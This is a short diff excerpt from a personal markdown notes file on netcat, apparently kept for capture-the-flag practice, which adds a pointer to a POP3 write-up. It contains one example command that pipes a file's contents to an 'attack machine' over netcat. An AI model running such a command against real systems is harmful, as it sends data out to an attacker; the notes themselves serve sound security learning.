ericbulloch/kwmd/tools/netcat.md

 `cat output.txt | nc 10.10.1.1 4444`

 Cat will grab the text in output.txt and send it to my attack machine on port 4444.

+## POP3

+Netcat is the tool I use when interacting with POP3.
+I have a write up that details interacting with [POP3](pop3.md) in my tools section.
+It covers the some of the more common scenarios that I have found during capture the flag events.

+All the examples and interactions use netcat.